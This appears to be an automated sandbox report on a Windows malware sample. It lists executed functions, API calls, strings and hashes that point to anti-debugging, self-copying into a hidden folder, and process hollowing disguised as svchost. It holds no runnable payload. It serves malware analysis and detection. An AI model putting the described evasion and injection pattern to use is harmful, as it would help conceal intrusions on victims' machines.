20465->20468 20466 7ff60e634146 20473 7ff60e633e45 20466->20473 20480 7ff60e63ae60 LeaveCriticalSection 20466->20480 20478 7ff60e63408c 20467->20478 20468->20466 20479 7ff60e63ae60 LeaveCriticalSection 20468->20479 20472 7ff60e63409a EncodePointer 20472->20478 20476 7ff60e6340ae DecodePointer EncodePointer 20477 7ff60e6340c7 DecodePointer DecodePointer 20476->20477 20477->20478 20478->20468 20478->20472 20478->20476

                                                                                        Executed Functions

                                                                                        Function 00007FF60E62FBA0 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 111COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExitProcess$DebuggerPresent
                                                                                        • String ID: GqgWzd$GqgWzd$svchost.exe
                                                                                        • API String ID: 613740775-3706196489
                                                                                        • Opcode ID: 9f5c7b640f57d296efcc2970fc598c3ee78b7c206099d74ffa78a16bb0841733
                                                                                        • Instruction ID: 9aa12d90c1a7502b742200da2e611078e4312f243aac732432a1ddad925ca282
                                                                                        • Opcode Fuzzy Hash: 9f5c7b640f57d296efcc2970fc598c3ee78b7c206099d74ffa78a16bb0841733
                                                                                        • Instruction Fuzzy Hash: 0B515F72A28A6282F7A49B30F91537E26A0FFB4314F60453AF48ED6595CF3DD509E740
                                                                                        Function 00007FF60E612BEC Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 69filenativeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileInitOpenStringUnicodeshared_ptrtype_info::_name_internal_method
                                                                                        • String ID: $0$@$\??\
                                                                                        • API String ID: 3492896725-1644384263
                                                                                        • Opcode ID: 80fea6cff64a10e925d1ccc44b306e79c79c634c3964aa946b29e6fce584649f
                                                                                        • Instruction ID: a1ba69adab5a251825326f1ac4ed72b0202181a7e3dea83e65136dff86996619
                                                                                        • Opcode Fuzzy Hash: 80fea6cff64a10e925d1ccc44b306e79c79c634c3964aa946b29e6fce584649f
                                                                                        • Instruction Fuzzy Hash: 99310732628AC496D760CB24F45439AB7A1F7943A0FA04235F69D83BE9EF7CC148CB00
                                                                                        Function 00007FF60E63060C Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                        • String ID:
                                                                                        • API String ID: 434396405-0
                                                                                        • Opcode ID: bab2983d0c2064314564850c59faab085e0d37512c9f18e1fbfae7b8d179e830
                                                                                        • Instruction ID: 66b3bcc9aa5ca31e881e9edfcb2c0b58e092906c530152a83e773b07b31f4587
                                                                                        • Opcode Fuzzy Hash: bab2983d0c2064314564850c59faab085e0d37512c9f18e1fbfae7b8d179e830
                                                                                        • Instruction Fuzzy Hash: C9310636629A9186E790DB15F49062EB7B0FBD5B44F605035FA8E83B68DF3DD805DB00
                                                                                        Function 00007FF60E612D60 Relevance: 7.6, APIs: 5, Instructions: 96filenativeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Temp$ErrorInformationInitLastNameOpenPathStringUnicodeWritetype_info::_name_internal_method
                                                                                        • String ID:
                                                                                        • API String ID: 3894097367-0
                                                                                        • Opcode ID: c60a68b48e15b36e6a162428543f0853a5545c5fe251748cadc2d8b93848373f
                                                                                        • Instruction ID: d02e8576bcd82c8b0eac5845e29d81794afc0ceac1ec5ab7ae7a49efc16c2084
                                                                                        • Opcode Fuzzy Hash: c60a68b48e15b36e6a162428543f0853a5545c5fe251748cadc2d8b93848373f
                                                                                        • Instruction Fuzzy Hash: D0411872618BC18AE7608B64F45439AB7A1F7857A4F504236E7AD83BE8EF7CC044DB00
                                                                                        Function 00007FF60E612F38 Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateSection
                                                                                        • String ID:
                                                                                        • API String ID: 3832541453-0
                                                                                        • Opcode ID: 3374a5a794764395d225ce62b5347c57fb9defcd6f270290a06b2f9aa5d2173a
                                                                                        • Instruction ID: 5e01a5e1dfb0b6660f5ddbd1db4c261fd68eab06a3449834a617acc17258fb6c
                                                                                        • Opcode Fuzzy Hash: 3374a5a794764395d225ce62b5347c57fb9defcd6f270290a06b2f9aa5d2173a
                                                                                        • Instruction Fuzzy Hash: C0015B3251CB9586D7218B18F45872A7660F7927B4F701324F7BD42AE8CF3DD454AB00
                                                                                        Function 00007FF60E612B44 Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: SectionView
                                                                                        • String ID:
                                                                                        • API String ID: 1323581903-0
                                                                                        • Opcode ID: 086008f540e24605ddfc47095f60edbd8a2cf42a36c31bf1750eee146be0699d
                                                                                        • Instruction ID: 48c22d230d0150ac2b099307ff51f269b03a3dac78b8417a67a94a1440177cc0
                                                                                        • Opcode Fuzzy Hash: 086008f540e24605ddfc47095f60edbd8a2cf42a36c31bf1750eee146be0699d
                                                                                        • Instruction Fuzzy Hash: 1901D072518B8586E3608F50F46835BB7A4F394398F604129F6C982AA8DFBDC088DF40
                                                                                        Function 00007FF60E630844 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 43stringCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 00007FF60E631174: GetWindowsDirectoryW.KERNEL32 ref: 00007FF60E6311AB
                                                                                          • Part of subcall function 00007FF60E631174: GetVolumeInformationW.KERNELBASE ref: 00007FF60E63124C
                                                                                          • Part of subcall function 00007FF60E631174: wsprintfW.USER32 ref: 00007FF60E6312DB
                                                                                        • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60E6307CD), ref: 00007FF60E63088D
                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60E6307CD), ref: 00007FF60E6308A2
                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60E6307CD), ref: 00007FF60E6308B5
                                                                                        • CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60E6307CD), ref: 00007FF60E6308C5
                                                                                        • SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60E6307CD), ref: 00007FF60E6308D8
                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60E6307CD), ref: 00007FF60E6308ED
                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60E6307CD), ref: 00007FF60E630900
                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60E6307CD), ref: 00007FF60E630915
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                        • String ID: .exe
                                                                                        • API String ID: 1846285901-4119554291
                                                                                        • Opcode ID: ca690622e8857ab72fdfef2eeac93b212aec148aeea99314529bf70ea303a71a
                                                                                        • Instruction ID: 98b4b4f462f0992a5ab9a3f76c4a54e45a5e8a1c2cd88df0ac0554ca20ab437a
                                                                                        • Opcode Fuzzy Hash: ca690622e8857ab72fdfef2eeac93b212aec148aeea99314529bf70ea303a71a
                                                                                        • Instruction Fuzzy Hash: 4F113632738A9685DB60DB25F85476EA321FBD4B41F505032FA8E83A6ADE7CD508D700
                                                                                        Function 00007FF60E612058 Relevance: 13.6, APIs: 9, Instructions: 65fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle$File$CreateMappingView
                                                                                        • String ID:
                                                                                        • API String ID: 1771758222-0
                                                                                        • Opcode ID: edae8342df2d6b86e2a31d811e725ecab3a5af5ba2ad6958d75b1e60dcb65b53
                                                                                        • Instruction ID: aacb05d96695d2992177083908626eb7c782d831f535907c88fed611dcf6cc2b
                                                                                        • Opcode Fuzzy Hash: edae8342df2d6b86e2a31d811e725ecab3a5af5ba2ad6958d75b1e60dcb65b53
                                                                                        • Instruction Fuzzy Hash: 53310E36628A9182E750DB25F86872E67A0FBD4B94F605035FB8E83B68CF3CD445DB00
                                                                                        Function 00007FF60E630798 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 00007FF60E631174: GetWindowsDirectoryW.KERNEL32 ref: 00007FF60E6311AB
                                                                                          • Part of subcall function 00007FF60E631174: GetVolumeInformationW.KERNELBASE ref: 00007FF60E63124C
                                                                                          • Part of subcall function 00007FF60E631174: wsprintfW.USER32 ref: 00007FF60E6312DB
                                                                                          • Part of subcall function 00007FF60E630844: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60E6307CD), ref: 00007FF60E63088D
                                                                                          • Part of subcall function 00007FF60E630844: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60E6307CD), ref: 00007FF60E6308A2
                                                                                          • Part of subcall function 00007FF60E630844: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60E6307CD), ref: 00007FF60E6308B5
                                                                                          • Part of subcall function 00007FF60E630844: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60E6307CD), ref: 00007FF60E6308C5
                                                                                          • Part of subcall function 00007FF60E630844: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60E6307CD), ref: 00007FF60E6308D8
                                                                                          • Part of subcall function 00007FF60E630844: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60E6307CD), ref: 00007FF60E6308ED
                                                                                          • Part of subcall function 00007FF60E630844: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60E6307CD), ref: 00007FF60E630900
                                                                                          • Part of subcall function 00007FF60E630844: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60E6307CD), ref: 00007FF60E630915
                                                                                        • GetModuleFileNameW.KERNEL32 ref: 00007FF60E6307DD
                                                                                        • DeleteFileW.KERNELBASE ref: 00007FF60E6307E8
                                                                                        • CopyFileW.KERNELBASE ref: 00007FF60E630801
                                                                                        • SetFileAttributesW.KERNEL32 ref: 00007FF60E630819
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                        • String ID: Services
                                                                                        • API String ID: 3209240227-2319745855
                                                                                        • Opcode ID: 823e6759efeda70e4ef3bae70da677e340206dab9cd5a6f55dc8ef6d8ad068b5
                                                                                        • Instruction ID: 0fdd7f0e628d7ff07e19dfe3d8d8f303c0d53b9cb8911525021dc6775d9ef448
                                                                                        • Opcode Fuzzy Hash: 823e6759efeda70e4ef3bae70da677e340206dab9cd5a6f55dc8ef6d8ad068b5
                                                                                        • Instruction Fuzzy Hash: 94012162B2855292EF90DB34F4543AA5360FBA4744FA05032F64DC29A5EE3CD60DEB40
                                                                                        Function 00007FF60E6134F0 Relevance: 7.6, APIs: 5, Instructions: 119fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileLibraryLoad$CreateModuleName
                                                                                        • String ID:
                                                                                        • API String ID: 1423211558-0
                                                                                        • Opcode ID: 8e19fe20eb70262ac2b9ee69aec7594eb78a2744813ecd72a26dbfba2eb32f7d
                                                                                        • Instruction ID: e7ccd51eb79060e8902ee1ed0627f2bb47ffc939d0ba0e793ff454a1dffbad53
                                                                                        • Opcode Fuzzy Hash: 8e19fe20eb70262ac2b9ee69aec7594eb78a2744813ecd72a26dbfba2eb32f7d
                                                                                        • Instruction Fuzzy Hash: 3E51286261CAD186E7219B65F4503AFBBA0FB96780F244035F6CD87BA9DF3DD0449B00
                                                                                        Function 00007FF60E631174 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                        • String ID: %08lX%04lX%lu
                                                                                        • API String ID: 3001812590-640692576
                                                                                        • Opcode ID: 08c2cf307d83d8194dc8edf4cd8c2b41345a18135c499c6c05916fe6c666ad14
                                                                                        • Instruction ID: 1c5e8764efabe3bed1403c6df4b3bbf3a09a6ed3c76e17ad0e2b3d19c3bce083
                                                                                        • Opcode Fuzzy Hash: 08c2cf307d83d8194dc8edf4cd8c2b41345a18135c499c6c05916fe6c666ad14
                                                                                        • Instruction Fuzzy Hash: B841492272824186E7109B28F45536AB7A0FBD5708F60113AF78DC7BA9EF7DD944CB00
                                                                                        Function 00007FF60E612A40 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51processstringCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressCreateHandleInternalModuleProcProcesslstrcat
                                                                                        • String ID: -k DcomLaunch -p -s LSM$h
                                                                                        • API String ID: 3850928873-3634226398
                                                                                        • Opcode ID: cbf9cf48c1dc7b8f51cecc3bdd54dc2d48e6b5326227f3c12f8a5634a48434dd
                                                                                        • Instruction ID: 59f5e9e38dfc159d9401b6d1a765a523d87c9d757109e54b2823bf5dca51dbf2
                                                                                        • Opcode Fuzzy Hash: cbf9cf48c1dc7b8f51cecc3bdd54dc2d48e6b5326227f3c12f8a5634a48434dd
                                                                                        • Instruction Fuzzy Hash: 60210732618B8282E760CF15F4543AAB7E5F794384F604135E68D83B68EF7DD158DB40
                                                                                        Function 00007FF60E612838 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThread$Wow64
                                                                                        • String ID:
                                                                                        • API String ID: 275855601-0
                                                                                        • Opcode ID: 590e80803c6a6598f6d34bf0cb9d71fc8d16245109229eb697420b8701098099
                                                                                        • Instruction ID: 47deed1491691ac3d2e9532e0729f6b750a372ad369985bf3a901a5c55b18b8d
                                                                                        • Opcode Fuzzy Hash: 590e80803c6a6598f6d34bf0cb9d71fc8d16245109229eb697420b8701098099
                                                                                        • Instruction Fuzzy Hash: B8315C6261C6C582E770CB15F45436AA7E1F788B80F904536EA8D83B68DF3CD504DF40
                                                                                        Function 00007FF60E611E8C Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Pointer$SizeWrite
                                                                                        • String ID:
                                                                                        • API String ID: 2087530826-0
                                                                                        • Opcode ID: 01f372b973729d4a890a8b11a1021b7c09579b66db996895b4a0bbe09a2f144b
                                                                                        • Instruction ID: 0440ee9865f8469b1ed6c6565c5dcc17d40415cde0b272face976ad4dab1cf94
                                                                                        • Opcode Fuzzy Hash: 01f372b973729d4a890a8b11a1021b7c09579b66db996895b4a0bbe09a2f144b
                                                                                        • Instruction Fuzzy Hash: D1110376A38A9187E750DF69F450A1EB7A1F7D6B40F506026FA8E83B18DF3CE4048B00
                                                                                        Function 00007FF60E630150 Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
